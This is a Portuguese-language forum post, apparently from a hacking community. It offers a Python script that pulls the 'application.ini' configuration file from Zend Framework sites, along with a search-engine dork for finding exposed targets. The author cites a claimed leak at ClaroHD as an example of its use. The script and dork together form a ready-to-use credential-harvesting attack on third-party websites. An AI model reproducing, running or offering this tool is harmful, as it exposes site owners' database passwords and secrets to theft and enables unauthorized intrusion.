Tava vendo umas configs do Zend aqui e vi que o diretório "/application/configs/" por mais que o arquivo esteja oculto ele consegue puxar via request, então desenvolvi um pequeno script em python para isso:
Vocês podem usar esse dork para achar targets:
Um exemplo do uso do exploit foi o Leaked na ClaroHD > Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Código:
#!/usr/bin/env python #-*- coding:UTF-8 -*- #Coded by _Vetus > http://www.twitter.com/_Vetus import urllib2 import sys def zendexploit(): if len(sys.argv) < 2: sys.exit('Usage: \'./zend.py url\'') req = urllib2.urlopen(sys.argv[1] + "/application/configs/application.ini") result = req.read() try: with open('output', 'w') as f: f.write(result) f.closed except: print "Error, try again and try to find what happen." zendexploit()
index of "/application/configs/"